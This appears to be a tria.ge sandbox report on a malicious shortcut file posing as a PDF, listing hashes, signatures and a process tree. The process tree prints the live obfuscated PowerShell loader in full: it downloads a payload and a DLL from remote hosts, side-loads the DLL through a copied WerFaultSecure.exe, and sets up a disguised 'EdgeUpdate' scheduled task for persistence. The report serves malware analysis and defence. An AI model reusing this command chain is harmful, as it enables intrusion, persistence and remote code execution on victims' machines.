Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    19/09/2024, 05:42

General

  • Target

    186523.pdf.lnk

  • Size

    3KB

  • MD5

    7007778e4e8c98c94d20b0243b7743f1

  • SHA1

    c771ee88e3951e337a26ebfdcfc1218d414dbdad

  • SHA256

    d7b278d20f47203da07c33f646844e74cb690ed802f2ba27a74e216368df7db9

  • SHA512

    25f21b662a55b64818b70d593b680bd3e1e05dbf0ee018cbd3912327006e0d5334df5552e9e469afe01797c3e00fc4c65aefbe45bce943d1944642babee87fcf

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory (3 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\186523.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" powershell $ProgressPreference = 'SilentlyContinue';i''w''r https://jihang.scapematic.info/eqhgrh/uybvjxosg -OutFile C:\ProgramData\186523.pdf;s''a''p''s C:\ProgramData\186523.pdf;i''w''r https://shianchi.scapematic.info/jhgfd/jkhxvcf -OutFile "C:\ProgramData\hal";r''e''n -Path "C:\ProgramData\hal" -NewName "C:\ProgramData\wer.dll";c''p C:\Windows\System32\WerFaultSecure.exe C:\ProgramData\WerFaultSecure.exe;c''p''i 'C:\ProgramData\186523.pdf' -destination .;sch''ta''s''ks /c''r''e''a''te /S''c minute /T''n EdgeUpdate /t''r 'C:\ProgramData\WerFaultSecure' /f;e''r''a''s''e *d?.?n?
      2⤵
        PID:2488

Network

MITRE ATT&CK Enterprise v15
